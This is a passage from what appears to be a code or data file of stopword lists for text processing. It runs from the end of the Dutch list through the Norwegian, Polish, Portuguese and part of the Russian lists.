\"eigen\",\n        \"eigenlijk\",\n        \"elk\",\n        \"elke\",\n        \"en\",\n        \"enige\",\n        \"er\",\n        \"erg\",\n        \"ergens\",\n        \"etc\",\n        \"etcetera\",\n        \"even\",\n        \"geen\",\n        \"genoeg\",\n        \"geweest\",\n        \"haar\",\n        \"haarzelf\",\n        \"had\",\n        \"hadden\",\n        \"heb\",\n        \"hebben\",\n        \"hebt\",\n        \"hedden\",\n        \"heeft\",\n        \"heel\",\n        \"hem\",\n        \"hemzelf\",\n        \"hen\",\n        \"het\",\n        \"hetzelfde\",\n        \"hier\",\n        \"hierin\",\n        \"hierna\",\n        \"hierom\",\n        \"hij\",\n        \"hijzelf\",\n        \"hoe\",\n        \"honderd\",\n        \"hun\",\n        \"ieder\",\n        \"iedere\",\n        \"iedereen\",\n        \"iemand\",\n        \"iets\",\n        \"ik\",\n        \"in\",\n        \"inderdaad\",\n        \"intussen\",\n        \"is\",\n        \"ja\",\n        \"je\",\n        \"jij\",\n        \"jijzelf\",\n        \"jou\",\n        \"jouw\",\n        \"jullie\",\n        \"kan\",\n        \"kon\",\n        \"konden\",\n        \"kun\",\n        \"kunnen\",\n        \"kunt\",\n        \"laatst\",\n        \"later\",\n        \"lijken\",\n        \"lijkt\",\n        \"maak\",\n        \"maakt\",\n        \"maakte\",\n        \"maakten\",\n        \"maar\",\n        \"mag\",\n        \"maken\",\n        \"me\",\n        \"meer\",\n        \"meest\",\n        \"meestal\",\n        \"men\",\n        \"met\",\n        \"mevr\",\n        \"mij\",\n        \"mijn\",\n        \"minder\",\n        \"miss\",\n        \"misschien\",\n        \"missen\",\n        \"mits\",\n        \"mocht\",\n        \"mochten\",\n        \"moest\",\n        \"moesten\",\n        \"moet\",\n        \"moeten\",\n        \"mogen\",\n        \"mr\",\n        \"mrs\",\n        \"mw\",\n        \"na\",\n        \"naar\",\n        \"nam\",\n        \"namelijk\",\n        \"nee\",\n        \"neem\",\n        \"negen\",\n        \"nemen\",\n        \"nergens\",\n        \"niemand\",\n        \"niet\",\n        \"niets\",\n        \"niks\",\n        \"noch\",\n        \"nochtans\",\n        \"nog\",\n        \"nooit\",\n        \"nu\",\n        \"nv\",\n        \"of\",\n        \"om\",\n        \"omdat\",\n        \"ondanks\",\n        \"onder\",\n        \"ondertussen\",\n        \"ons\",\n        \"onze\",\n        \"onzeker\",\n        \"ooit\",\n        \"ook\",\n        \"op\",\n        \"over\",\n        \"overal\",\n        \"overige\",\n        \"paar\",\n        \"per\",\n        \"recent\",\n        \"redelijk\",\n        \"samen\",\n        \"sinds\",\n        \"steeds\",\n        \"te\",\n        \"tegen\",\n        \"tegenover\",\n        \"thans\",\n        \"tien\",\n        \"tiende\",\n        \"tijdens\",\n        \"tja\",\n        \"toch\",\n        \"toe\",\n        \"tot\",\n        \"totdat\",\n        \"tussen\",\n        \"twee\",\n        \"tweede\",\n        \"u\",\n        \"uit\",\n        \"uw\",\n        \"vaak\",\n        \"van\",\n        \"vanaf\",\n        \"veel\",\n        \"veertig\",\n        \"verder\",\n        \"verscheidene\",\n        \"verschillende\",\n        \"via\",\n        \"vier\",\n        \"vierde\",\n        \"vijf\",\n        \"vijfde\",\n        \"vijftig\",\n        \"volgend\",\n        \"volgens\",\n        \"voor\",\n        \"voordat\",\n        \"voorts\",\n        \"waar\",\n        \"waarom\",\n        \"waarschijnlijk\",\n        \"wanneer\",\n        \"waren\",\n        \"was\",\n        \"wat\",\n        \"we\",\n        \"wederom\",\n        \"weer\",\n        \"weinig\",\n        \"wel\",\n        \"welk\",\n        \"welke\",\n        \"werd\",\n        \"werden\",\n        \"werder\",\n        \"whatever\",\n        \"wie\",\n        \"wij\",\n        \"wijzelf\",\n        \"wil\",\n        \"wilden\",\n        \"willen\",\n        \"word\",\n        \"worden\",\n        \"wordt\",\n        \"zal\",\n        \"ze\",\n        \"zei\",\n        \"zeker\",\n        \"zelf\",\n        \"zelfde\",\n        \"zes\",\n        \"zeven\",\n        \"zich\",\n        \"zij\",\n        \"zijn\",\n        \"zijzelf\",\n        \"zo\",\n        \"zoals\",\n        \"zodat\",\n        \"zou\",\n        \"zouden\",\n        \"zulk\",\n        \"zullen\",\n    ],\n    \"no\": [\n        \"alle\",\n        \"at\",\n        \"av\",\n        \"bare\",\n        \"begge\",\n        \"ble\",\n        \"blei\",\n        \"bli\",\n        \"blir\",\n        \"blitt\",\n        \"både\",\n        \"båe\",\n        \"da\",\n        \"de\",\n        \"deg\",\n        \"dei\",\n        \"deim\",\n        \"deira\",\n        \"deires\",\n        \"dem\",\n        \"den\",\n        \"denne\",\n        \"der\",\n        \"dere\",\n        \"deres\",\n        \"det\",\n        \"dette\",\n        \"di\",\n        \"din\",\n        \"disse\",\n        \"ditt\",\n        \"du\",\n        \"dykk\",\n        \"dykkar\",\n        \"då\",\n        \"eg\",\n        \"ein\",\n        \"eit\",\n        \"eitt\",\n        \"eller\",\n        \"elles\",\n        \"en\",\n        \"enn\",\n        \"er\",\n        \"et\",\n        \"ett\",\n        \"etter\",\n        \"for\",\n        \"fordi\",\n        \"fra\",\n        \"før\",\n        \"ha\",\n        \"hadde\",\n        \"han\",\n        \"hans\",\n        \"har\",\n        \"hennar\",\n        \"henne\",\n        \"hennes\",\n        \"her\",\n        \"hjå\",\n        \"ho\",\n        \"hoe\",\n        \"honom\",\n        \"hoss\",\n        \"hossen\",\n        \"hun\",\n        \"hva\",\n        \"hvem\",\n        \"hver\",\n        \"hvilke\",\n        \"hvilken\",\n        \"hvis\",\n        \"hvor\",\n        \"hvordan\",\n        \"hvorfor\",\n        \"i\",\n        \"ikke\",\n        \"ikkje\",\n        \"ingen\",\n        \"ingi\",\n        \"inkje\",\n        \"inn\",\n        \"inni\",\n        \"ja\",\n        \"jeg\",\n        \"kan\",\n        \"kom\",\n        \"korleis\",\n        \"korso\",\n        \"kun\",\n        \"kunne\",\n        \"kva\",\n        \"kvar\",\n        \"kvarhelst\",\n        \"kven\",\n        \"kvi\",\n        \"kvifor\",\n        \"man\",\n        \"mange\",\n        \"me\",\n        \"med\",\n        \"medan\",\n        \"meg\",\n        \"meget\",\n        \"mellom\",\n        \"men\",\n        \"mi\",\n        \"min\",\n        \"mine\",\n        \"mitt\",\n        \"mot\",\n        \"mykje\",\n        \"ned\",\n        \"no\",\n        \"noe\",\n        \"noen\",\n        \"noka\",\n        \"noko\",\n        \"nokon\",\n        \"nokor\",\n        \"nokre\",\n        \"nå\",\n        \"når\",\n        \"og\",\n        \"også\",\n        \"om\",\n        \"opp\",\n        \"oss\",\n        \"over\",\n        \"på\",\n        \"samme\",\n        \"seg\",\n        \"selv\",\n        \"si\",\n        \"sia\",\n        \"sidan\",\n        \"siden\",\n        \"sin\",\n        \"sine\",\n        \"sitt\",\n        \"sjøl\",\n        \"skal\",\n        \"skulle\",\n        \"slik\",\n        \"so\",\n        \"som\",\n        \"somme\",\n        \"somt\",\n        \"så\",\n        \"sånn\",\n        \"til\",\n        \"um\",\n        \"upp\",\n        \"ut\",\n        \"uten\",\n        \"var\",\n        \"vart\",\n        \"varte\",\n        \"ved\",\n        \"vere\",\n        \"verte\",\n        \"vi\",\n        \"vil\",\n        \"ville\",\n        \"vore\",\n        \"vors\",\n        \"vort\",\n        \"vår\",\n        \"være\",\n        \"vært\",\n        \"å\",\n    ],\n    \"pl\": [\n        \"aby\",\n        \"ach\",\n        \"aj\",\n        \"albo\",\n        \"ale\",\n        \"ani\",\n        \"aż\",\n        \"bardzo\",\n        \"bez\",\n        \"bo\",\n        \"bowiem\",\n        \"by\",\n        \"byli\",\n        \"bym\",\n        \"być\",\n        \"był\",\n        \"była\",\n        \"było\",\n        \"były\",\n        \"będzie\",\n        \"będą\",\n        \"chce\",\n        \"choć\",\n        \"ci\",\n        \"ciebie\",\n        \"cię\",\n        \"co\",\n        \"coraz\",\n        \"coś\",\n        \"czy\",\n        \"czyli\",\n        \"często\",\n        \"daleko\",\n        \"dla\",\n        \"dlaczego\",\n        \"dlatego\",\n        \"do\",\n        \"dobrze\",\n        \"dokąd\",\n        \"dość\",\n        \"dr\",\n        \"dużo\",\n        \"dwa\",\n        \"dwaj\",\n        \"dwie\",\n        \"dwoje\",\n        \"dzisiaj\",\n        \"dziś\",\n        \"gdy\",\n        \"gdyby\",\n        \"gdyż\",\n        \"gdzie\",\n        \"go\",\n        \"godz\",\n        \"hab\",\n        \"i\",\n        \"ich\",\n        \"ii\",\n        \"iii\",\n        \"ile\",\n        \"im\",\n        \"inne\",\n        \"inny\",\n        \"inż\",\n        \"iv\",\n        \"ix\",\n        \"iż\",\n        \"ja\",\n        \"jak\",\n        \"jakby\",\n        \"jaki\",\n        \"jakie\",\n        \"jako\",\n        \"je\",\n        \"jeden\",\n        \"jedna\",\n        \"jednak\",\n        \"jedno\",\n        \"jednym\",\n        \"jedynie\",\n        \"jego\",\n        \"jej\",\n        \"jemu\",\n        \"jest\",\n        \"jestem\",\n        \"jeszcze\",\n        \"jeśli\",\n        \"jeżeli\",\n        \"już\",\n        \"ją\",\n        \"każdy\",\n        \"kiedy\",\n        \"kierunku\",\n        \"kilku\",\n        \"kto\",\n        \"która\",\n        \"które\",\n        \"którego\",\n        \"której\",\n        \"który\",\n        \"których\",\n        \"którym\",\n        \"którzy\",\n        \"ku\",\n        \"lat\",\n        \"lecz\",\n        \"lub\",\n        \"ma\",\n        \"mają\",\n        \"mam\",\n        \"mamy\",\n        \"mgr\",\n        \"mi\",\n        \"miał\",\n        \"mimo\",\n        \"mnie\",\n        \"mną\",\n        \"mogą\",\n        \"moi\",\n        \"moja\",\n        \"moje\",\n        \"może\",\n        \"można\",\n        \"mu\",\n        \"musi\",\n        \"my\",\n        \"mój\",\n        \"na\",\n        \"nad\",\n        \"nam\",\n        \"nami\",\n        \"nas\",\n        \"nasi\",\n        \"nasz\",\n        \"nasza\",\n        \"nasze\",\n        \"natychmiast\",\n        \"nawet\",\n        \"nic\",\n        \"nich\",\n        \"nie\",\n        \"niego\",\n        \"niej\",\n        \"niemu\",\n        \"nigdy\",\n        \"nim\",\n        \"nimi\",\n        \"nią\",\n        \"niż\",\n        \"no\",\n        \"nowe\",\n        \"np\",\n        \"nr\",\n        \"o\",\n        \"o.o.\",\n        \"obok\",\n        \"od\",\n        \"ok\",\n        \"około\",\n        \"on\",\n        \"ona\",\n        \"one\",\n        \"oni\",\n        \"ono\",\n        \"oraz\",\n        \"owszem\",\n        \"pan\",\n        \"pl\",\n        \"po\",\n        \"pod\",\n        \"ponad\",\n        \"ponieważ\",\n        \"poza\",\n        \"prof\",\n        \"przed\",\n        \"przede\",\n        \"przedtem\",\n        \"przez\",\n        \"przy\",\n        \"raz\",\n        \"razie\",\n        \"roku\",\n        \"również\",\n        \"sam\",\n        \"sama\",\n        \"się\",\n        \"skąd\",\n        \"sobie\",\n        \"sposób\",\n        \"swoje\",\n        \"są\",\n        \"ta\",\n        \"tak\",\n        \"taki\",\n        \"takich\",\n        \"takie\",\n        \"także\",\n        \"tam\",\n        \"te\",\n        \"tego\",\n        \"tej\",\n        \"tel\",\n        \"temu\",\n        \"ten\",\n        \"teraz\",\n        \"też\",\n        \"to\",\n        \"tobie\",\n        \"tobą\",\n        \"trzeba\",\n        \"tu\",\n        \"tutaj\",\n        \"twoi\",\n        \"twoja\",\n        \"twoje\",\n        \"twój\",\n        \"ty\",\n        \"tych\",\n        \"tylko\",\n        \"tym\",\n        \"tys\",\n        \"tzw\",\n        \"tę\",\n        \"u\",\n        \"ul\",\n        \"vi\",\n        \"vii\",\n        \"viii\",\n        \"vol\",\n        \"w\",\n        \"wam\",\n        \"wami\",\n        \"was\",\n        \"wasi\",\n        \"wasz\",\n        \"wasza\",\n        \"wasze\",\n        \"we\",\n        \"wie\",\n        \"więc\",\n        \"wszystko\",\n        \"wtedy\",\n        \"www\",\n        \"wy\",\n        \"właśnie\",\n        \"wśród\",\n        \"xi\",\n        \"xii\",\n        \"xiii\",\n        \"xiv\",\n        \"xv\",\n        \"z\",\n        \"za\",\n        \"zawsze\",\n        \"zaś\",\n        \"ze\",\n        \"zł\",\n        \"żaden\",\n        \"że\",\n        \"żeby\",\n    ],\n    \"pt\": [\n        \"a\",\n        \"acerca\",\n        \"adeus\",\n        \"agora\",\n        \"ainda\",\n        \"algmas\",\n        \"algo\",\n        \"algumas\",\n        \"alguns\",\n        \"ali\",\n        \"além\",\n        \"ambos\",\n        \"ano\",\n        \"anos\",\n        \"antes\",\n        \"ao\",\n        \"aos\",\n        \"apenas\",\n        \"apoio\",\n        \"apontar\",\n        \"após\",\n        \"aquela\",\n        \"aquelas\",\n        \"aquele\",\n        \"aqueles\",\n        \"aqui\",\n        \"aquilo\",\n        \"as\",\n        \"assim\",\n        \"através\",\n        \"atrás\",\n        \"até\",\n        \"aí\",\n        \"baixo\",\n        \"bastante\",\n        \"bem\",\n        \"bom\",\n        \"breve\",\n        \"cada\",\n        \"caminho\",\n        \"catorze\",\n        \"cedo\",\n        \"cento\",\n        \"certamente\",\n        \"certeza\",\n        \"cima\",\n        \"cinco\",\n        \"coisa\",\n        \"com\",\n        \"como\",\n        \"comprido\",\n        \"conhecido\",\n        \"conselho\",\n        \"contra\",\n        \"corrente\",\n        \"custa\",\n        \"cá\",\n        \"da\",\n        \"daquela\",\n        \"daquele\",\n        \"dar\",\n        \"das\",\n        \"de\",\n        \"debaixo\",\n        \"demais\",\n        \"dentro\",\n        \"depois\",\n        \"desde\",\n        \"desligado\",\n        \"dessa\",\n        \"desse\",\n        \"desta\",\n        \"deste\",\n        \"deve\",\n        \"devem\",\n        \"deverá\",\n        \"dez\",\n        \"dezanove\",\n        \"dezasseis\",\n        \"dezassete\",\n        \"dezoito\",\n        \"dia\",\n        \"diante\",\n        \"direita\",\n        \"diz\",\n        \"dizem\",\n        \"dizer\",\n        \"do\",\n        \"dois\",\n        \"dos\",\n        \"doze\",\n        \"duas\",\n        \"dá\",\n        \"dão\",\n        \"dúvida\",\n        \"e\",\n        \"ela\",\n        \"elas\",\n        \"ele\",\n        \"eles\",\n        \"em\",\n        \"embora\",\n        \"enquanto\",\n        \"entre\",\n        \"então\",\n        \"era\",\n        \"essa\",\n        \"essas\",\n        \"esse\",\n        \"esses\",\n        \"esta\",\n        \"estado\",\n        \"estar\",\n        \"estará\",\n        \"estas\",\n        \"estava\",\n        \"este\",\n        \"estes\",\n        \"esteve\",\n        \"estive\",\n        \"estivemos\",\n        \"estiveram\",\n        \"estiveste\",\n        \"estivestes\",\n        \"estou\",\n        \"está\",\n        \"estás\",\n        \"estão\",\n        \"eu\",\n        \"exemplo\",\n        \"falta\",\n        \"fará\",\n        \"favor\",\n        \"faz\",\n        \"fazeis\",\n        \"fazem\",\n        \"fazemos\",\n        \"fazer\",\n        \"fazes\",\n        \"fazia\",\n        \"faço\",\n        \"fez\",\n        \"fim\",\n        \"final\",\n        \"foi\",\n        \"fomos\",\n        \"for\",\n        \"fora\",\n        \"foram\",\n        \"forma\",\n        \"foste\",\n        \"fostes\",\n        \"fui\",\n        \"geral\",\n        \"grande\",\n        \"grandes\",\n        \"grupo\",\n        \"hoje\",\n        \"horas\",\n        \"há\",\n        \"iniciar\",\n        \"inicio\",\n        \"ir\",\n        \"irá\",\n        \"isso\",\n        \"ista\",\n        \"iste\",\n        \"isto\",\n        \"já\",\n        \"lado\",\n        \"ligado\",\n        \"local\",\n        \"logo\",\n        \"longe\",\n        \"lugar\",\n        \"lá\",\n        \"maior\",\n        \"maioria\",\n        \"maiorias\",\n        \"mais\",\n        \"mal\",\n        \"mas\",\n        \"me\",\n        \"meio\",\n        \"menor\",\n        \"menos\",\n        \"meses\",\n        \"mesmo\",\n        \"meu\",\n        \"meus\",\n        \"mil\",\n        \"minha\",\n        \"minhas\",\n        \"momento\",\n        \"muito\",\n        \"muitos\",\n        \"máximo\",\n        \"mês\",\n        \"na\",\n        \"nada\",\n        \"naquela\",\n        \"naquele\",\n        \"nas\",\n        \"nem\",\n        \"nenhuma\",\n        \"nessa\",\n        \"nesse\",\n        \"nesta\",\n        \"neste\",\n        \"no\",\n        \"noite\",\n        \"nome\",\n        \"nos\",\n        \"nossa\",\n        \"nossas\",\n        \"nosso\",\n        \"nossos\",\n        \"nova\",\n        \"nove\",\n        \"novo\",\n        \"novos\",\n        \"num\",\n        \"numa\",\n        \"nunca\",\n        \"não\",\n        \"nível\",\n        \"nós\",\n        \"número\",\n        \"o\",\n        \"obra\",\n        \"obrigada\",\n        \"obrigado\",\n        \"oitava\",\n        \"oitavo\",\n        \"oito\",\n        \"onde\",\n        \"ontem\",\n        \"onze\",\n        \"os\",\n        \"ou\",\n        \"outra\",\n        \"outras\",\n        \"outro\",\n        \"outros\",\n        \"para\",\n        \"parece\",\n        \"parte\",\n        \"partir\",\n        \"pegar\",\n        \"pela\",\n        \"pelas\",\n        \"pelo\",\n        \"pelos\",\n        \"perto\",\n        \"pessoas\",\n        \"pode\",\n        \"podem\",\n        \"poder\",\n        \"poderá\",\n        \"podia\",\n        \"ponto\",\n        \"pontos\",\n        \"por\",\n        \"porque\",\n        \"porquê\",\n        \"posição\",\n        \"possivelmente\",\n        \"posso\",\n        \"possível\",\n        \"pouca\",\n        \"pouco\",\n        \"povo\",\n        \"primeira\",\n        \"primeiro\",\n        \"promeiro\",\n        \"próprio\",\n        \"próximo\",\n        \"puderam\",\n        \"pôde\",\n        \"põe\",\n        \"põem\",\n        \"qual\",\n        \"qualquer\",\n        \"quando\",\n        \"quanto\",\n        \"quarta\",\n        \"quarto\",\n        \"quatro\",\n        \"que\",\n        \"quem\",\n        \"quer\",\n        \"quero\",\n        \"questão\",\n        \"quieto\",\n        \"quinta\",\n        \"quinto\",\n        \"quinze\",\n        \"quê\",\n        \"relação\",\n        \"sabe\",\n        \"saber\",\n        \"se\",\n        \"segunda\",\n        \"segundo\",\n        \"sei\",\n        \"seis\",\n        \"sem\",\n        \"sempre\",\n        \"ser\",\n        \"seria\",\n        \"sete\",\n        \"seu\",\n        \"seus\",\n        \"sexta\",\n        \"sexto\",\n        \"sim\",\n        \"sistema\",\n        \"sob\",\n        \"sobre\",\n        \"sois\",\n        \"somente\",\n        \"somos\",\n        \"sou\",\n        \"sua\",\n        \"suas\",\n        \"são\",\n        \"sétima\",\n        \"sétimo\",\n        \"tal\",\n        \"talvez\",\n        \"também\",\n        \"tanto\",\n        \"tarde\",\n        \"te\",\n        \"tem\",\n        \"temos\",\n        \"tempo\",\n        \"tendes\",\n        \"tenho\",\n        \"tens\",\n        \"tentar\",\n        \"tentaram\",\n        \"tente\",\n        \"tentei\",\n        \"ter\",\n        \"terceira\",\n        \"terceiro\",\n        \"teu\",\n        \"teus\",\n        \"teve\",\n        \"tipo\",\n        \"tive\",\n        \"tivemos\",\n        \"tiveram\",\n        \"tiveste\",\n        \"tivestes\",\n        \"toda\",\n        \"todas\",\n        \"todo\",\n        \"todos\",\n        \"trabalhar\",\n        \"trabalho\",\n        \"treze\",\n        \"três\",\n        \"tu\",\n        \"tua\",\n        \"tuas\",\n        \"tudo\",\n        \"tão\",\n        \"têm\",\n        \"um\",\n        \"uma\",\n        \"umas\",\n        \"uns\",\n        \"usa\",\n        \"usar\",\n        \"vai\",\n        \"vais\",\n        \"valor\",\n        \"veja\",\n        \"vem\",\n        \"vens\",\n        \"ver\",\n        \"verdade\",\n        \"verdadeiro\",\n        \"vez\",\n        \"vezes\",\n        \"viagem\",\n        \"vindo\",\n        \"vinte\",\n        \"você\",\n        \"vocês\",\n        \"vos\",\n        \"vossa\",\n        \"vossas\",\n        \"vosso\",\n        \"vossos\",\n        \"vários\",\n        \"vão\",\n        \"vêm\",\n        \"vós\",\n        \"zero\",\n        \"à\",\n        \"às\",\n        \"área\",\n        \"é\",\n        \"és\",\n        \"último\",\n    ],\n    \"ru\": [\n        \"а\",\n        \"алло\",\n        \"без\",\n        \"белый\",\n        \"близко\",\n        \"более\",\n        \"больше\",\n        \"большой\",\n        \"будем\",\n        \"будет\",\n        \"будете\",\n        \"будешь\",\n        \"будто\",\n        \"буду\",\n        \"будут\",\n        \"будь\",\n        \"бы\",\n        \"бывает\",\n        \"бывь\",\n        \"был\",\n        \"была\",\n        \"были\",\n        \"было\",\n        \"быть\",\n        \"в\",\n        \"важная\",\n        \"важное\",\n        \"важные\",\n        \"важный\",\n        \"вам\",\n        \"вами\",\n        \"вас\",\n        \"ваш\",\n        \"ваша\",\n        \"ваше\",\n        \"ваши\",\n        \"вверх\",\n        \"вдали\",\n        \"вдруг\",\n        \"ведь\",\n        \"везде\",\n        \"вернуться\",\n        \"весь\",\n        \"вечер\",\n        \"взгляд\",\n        \"взять\",\n        \"вид\",\n        \"видеть\",\n        \"вместе\",\n        \"вниз\",\n        \"внизу\",\n        \"во\",\n        \"вода\",\n        \"война\",\n        \"вокруг\",\n        \"вон\",\n        \"вообще\",\n        \"вопрос\",\n        \"восемнадцатый\",\n        \"восемнадцать\",\n        \"восемь\",\n        \"восьмой\",\n        \"вот\",\n        \"впрочем\",\n        \"времени\",\n        \"время\",\n        \"все\",\n        \"всегда\",\n        \"всего\",\n        \"всем\",\n        \"всеми\",\n        \"всему\",\n        \"всех\",\n        \"всею\",\n        \"всю\",\n        \"всюду\",\n        \"вся\",\n        \"всё\",\n        \"второй\",\n        \"вы\",\n        \"выйти\",\n        \"г\",\n        \"где\",\n        \"главный\",\n        \"глаз\",\n        \"говорил\",\n        \"говорит\",\n        \"говорить\",\n        \"год\",\n        \"года\",\n        \"году\",\n        \"голова\",\n        \"голос\",\n        \"город\",\n        \"да\",\n        \"давать\",\n        \"давно\",\n        \"даже\",\n        \"далекий\",\n        \"далеко\",\n        \"дальше\",\n        \"даром\",\n        \"дать\",\n        \"два\",\n        \"двадцатый\",\n        \"двадцать\",\n        \"две\",\n        \"двенадцатый\",\n        \"двенадцать\",\n        \"дверь\",\n        \"двух\",\n        \"девятнадцатый\",\n        \"девятнадцать\",\n        \"девятый\",\n        \"девять\",\n        \"действительно\",\n        \"дел\",\n        \"делать\",\n        \"дело\",\n        \"день\",\n        \"деньги\",\n        \"десятый\",\n        \"десять\",\n        \"для\",\n        \"до\",\n        \"довольно\",\n        \"долго\",\n        \"должно\",\n        \"должный\",\n        \"дом\",\n        \"дорога\",\n        \"друг\",\n        \"другая\",\n        \"другие\",\n        \"других\",\n        \"друго\",\n        \"другое\",\n        \"другой\",\n        \"думать\",\n        \"душа\",\n        \"е\",\n        \"его\",\n        \"ее\",\n        \"ей\",\n        \"ему\",\n        \"если\",\n        \"есть\",\n        \"еще\",\n        \"ещё\",\n        \"ею\",\n        \"её\",\n        \"ж\",\n        \"ждать\",\n        \"же\",\n        \"жена\",\n        \"женщина\",\n        \"жизнь\",\n        \"жить\",\n        \"за\",\n        \"занят\",\n        \"занята\",\n        \"занято\",\n        \"заняты\",\n        \"затем\",\n        \"зато\",\n        \"зачем\",\n        \"здесь\",\n        \"земля\",\n        \"знать\",\n        \"значит\",\n        \"значить\",\n        \"и\",\n        \"идти\",\n        \"из\",\n        \"или\",\n        \"им\",\n        \"именно\",\n        \"иметь\",\n        \"ими\",\n        \"имя\",\n        \"иногда\",\n        \"их\",\n        \"к\",\n        \"каждая\",\n        \"каждое\",\n        \"каждые\",\n        \"каждый\",\n        \"кажется\",\n        \"казаться\",\n        \"как\",\n        \"какая\",\n        \"какой\",\n        \"кем\",\n        \"книга\",\n        \"когда\",\n        \"кого\",\n        \"ком\",\n        \"комната\",\n        \"кому\",\n        \"конец\",\n        \"конечно\",\n        \"которая\",\n        \"которого\",\n        \"которой\",\n        \"которые\",\n        \"который\",\n        \"которых\",\n        \"кроме\",\n        \"кругом\",\n        \"кто\",\n        \"куда\",\n        \"лежать\",\n        \"лет\",\n        \"ли\",\n        \"лицо\",\n        \"лишь\",\n        \"лучше\",\n        \"любить\",\n        \"люди\",\n        \"м\",\n        \"маленький\",\n        \"мало\",\n        \"мать\",\n        \"машина\",\n        \"между\",\n        \"меля\",\n        \"менее\",\n        \"меньше\",\n        \"меня\",\n        \"место\",\n        \"миллионов\",\n        \"мимо\",\n        \"минута\",\n        \"мир\",\n        \"мира\",\n        \"мне\",\n        \"много\",\n        \"многочисленная\",\n        \"многочисленное\",\n        \"многочисленные\",\n        \"многочисленный\",\n        \"мной\",\n        \"мною\",\n        \"мог\",\n        \"могут\",\n        \"мож\",\n        \"может\",\n        \"можно\",\n        \"можхо\",\n        \"мои\",\n        \"мой\",\n        \"мор\",\n        \"москва\",\n        \"мочь\",\n        \"моя\",\n        \"моё\",\n        \"мы\",\n        \"на\",\n        \"наверху\",\n        \"над\",\n        \"надо\",\n        \"назад\",\n        \"наиболее\",\n        \"найти\",\n        \"наконец\",\n        \"нам\",\n        \"нами\",\n        \"народ\",\n        \"нас\",\n        \"начала\",\n        \"начать\",\n        \"наш\",\n        \"наша\",\n        \"наше\",\n        \"наши\",\n        \"не\",\n        \"него\",\n        \"недавно\",\n        \"недалеко\",\n        \"нее\",\n        \"ней\",\n        \"некоторый\",\n        \"нельзя\",\n        \"нем\",\n        \"немного\",\n        \"нему\",\n        \"непрерывно\",\n        \"нередко\",\n        \"несколько\",\n        \"нет\",\n        \"нею\",\n        \"неё\",\n        \"ни\",\n        \"нибудь\",\n        \"ниже\",\n        \"низко\",\n        \"никакой\",\n        \"никогда\",\n        \"никто\",\n        \"никуда\",\n        \"ними\",\n        \"них\",\n        \"ничего\",\n        \"ничто\",\n        \"но\",\n        \"новый\",\n        \"нога\",\n        \"ночь\",\n        \"ну\",\n        \"нужно\",\n        \"нужный\",\n        \"нх\",\n        \"о\",\n        \"об\",\n        \"оба\",\n        \"обычно\",\n        \"один\",\n        \"одиннадцатый\",\n        \"одиннадцать\",\n        \"однажды\",\n        \"однако\",\n        \"одного\",\n        \"одной\",\n        \"оказаться\",\n        \"окно\",\n        \"около\",\n        \"он\",\n        \"она\",\n        \"они\",\n        \"оно\",\n        \"опять\",\n        \"особенно\",\n        \"остаться\",\n        \"от\",\n        \"ответить\",\n        \"отец\",\n        \"отовсюду\",\n        \"отсюда\",\n        \"очень\",\n        \"первый\",\n        \"перед\",\n        \"писать\",\n        \"плечо\",\n        \"по\",\n        \"под\",\n        \"подумать\",\n        \"пожалуйста\",\n        \"позже\",\n        \"пойти\",\n        \"пока\",\n        \"пол\",\n        \"получить\",\n        \"помнить\",\n        \"понимать\",\n        \"понять\",\n        \"пор\",\n        \"пора\",\n        \"после\",\n        \"последний\",\n        \"посмотреть\",\n        \"посреди\",\n        \"потом\",\n        \"потому\",\n        \"почему\",\n        \"почти\",\n        \"правда\",\n        \"прекрасно\",\n        \"при\",\n        \"про\",\n        \"просто\",\n        \"против\",\n        \"процентов\",\n        \"пятнадцатый\",\n        \"пятнадцать\",\n        \"пятый\",\n        \"пять\",\n        \"работа\",\n        \"работать\",\n        \"раз\",\n        \"разве\",\n        \"рано\",\n        \"раньше\",\n        \"ребенок\",\n        \"решить\",\n        \"россия\",\n        \"рука\",\n        \"русский\",\n        \"ряд\",\n        \"рядом\",\n        \"с\",\n        \"сам\",\n        \"сама\",\n        \"сами\",\n        \"самим\",\n        \"самими\",\n        \"самих\",\n        \"само\",\n        \"самого\",\n        \"самой\",\n        \"самом\",\n        \"самому\",\n        \"саму\",\n        \"самый\",\n        \"свет\",\n        \"свое\",\n        \"своего\",\n        \"своей\",\n        \"свои\",\n        \"своих\",\n        \"свой\",\n        \"свою\",\n        \"сделать\",\n        \"сеаой\",\n        \"себе\",\n        \"себя\",\n        \"сегодня\",\n        \"седьмой\",\n        \"сейчас\",\n        \"семнадцатый\",\n        \"семнадцать\",\n        \"семь\",\n        \"сидеть\",\n        \"сила\",\n        \"сих\",\n        \"сказал\",\n        \"сказала\",\n        \"сказать\",\n        \"сколько\",\n        \"слишком\",\n        \"слово\",\n        \"случай\",\n        \"смотреть\",\n        \"сначала\",\n        \"снова\",\n        \"со\",\n        \"собой\",\n        \"собою\",\n        \"советский\",\n        \"совсем\",\n        \"спасибо\",\n        \"спросить\",\n        \"сразу\",\n        \"стал\",\n        \"старый\",\n        \"стать\",\n        \"стол\",\n        \"сторона\",\n        \"стоять\",\n        \"страна\",\n        \"суть\",\n        \"считать\",\n        \"т\",\n        \"та\",\n        \"так\",\n        \"такая\",\n        \"также\",\n        \"таки\",\n        \"такие\",\n        \"такое\",\n        \"такой\",\n        \"там\",\n        \"твой\",\n        \"твоя\",\n        \"твоё\",\n        \"те\",\n        \"тебе\",\n        \"тебя\",\n        \"тем\",\n        \"теми\",\n        \"теперь\",\n        \"тех\",\n        \"то\",\n        \"тобой\",\n        \"тобою\",\n        \"товарищ\",\n        \"тогда\",\n        \"того\",\n        \"тоже\",\n        \"только\",\n        \"том\",\n        \"тому\",\n        \"тот\",\n        \"тою\",\n        \"третий\",\n        \"три\",\n        \"тринадцатый\",\n        \"тринадцать\",\n        \"ту\",\n        \"туда\",\n        \"тут\",\n        \"ты\",\n        \"тысяч\",\n        \"у\",\n        \"увидеть\",\n        \"уж\",\n        \"уже\",\n        \"улица\",\n        \"уметь\",\n        \"утро\",\n        \"хороший\",\n        \"хорошо\",\n        \"хотеть\",\n        \"хоть\",\n        \"хотя\",\n        \"хочешь\",\n        \"час\",\n        \"часто\",\n        \"часть\",\n        \"чаще\",\n        \"чего\",\n        \"человек\",\n        \"чем\",\n        \"чему\",\n        \"через\",\n        \"четвертый\",\n        \"четыре\",\n        \"четырнадцатый\",\n        \"четырнадцать\",\n        \"что\",\n        \"чтоб\",\n        \"чтобы\",\n        \"чуть\",\n        \"шестнадцатый\",\n        \"шестнадцать\",\n        \"шестой\",\n        \"шесть\",\n        \"эта\",\n        \"эти\",\n        \"этим\",\n        \"этими\",\n        \"этих\",\n        \"это\",\n        \"этого\",\n        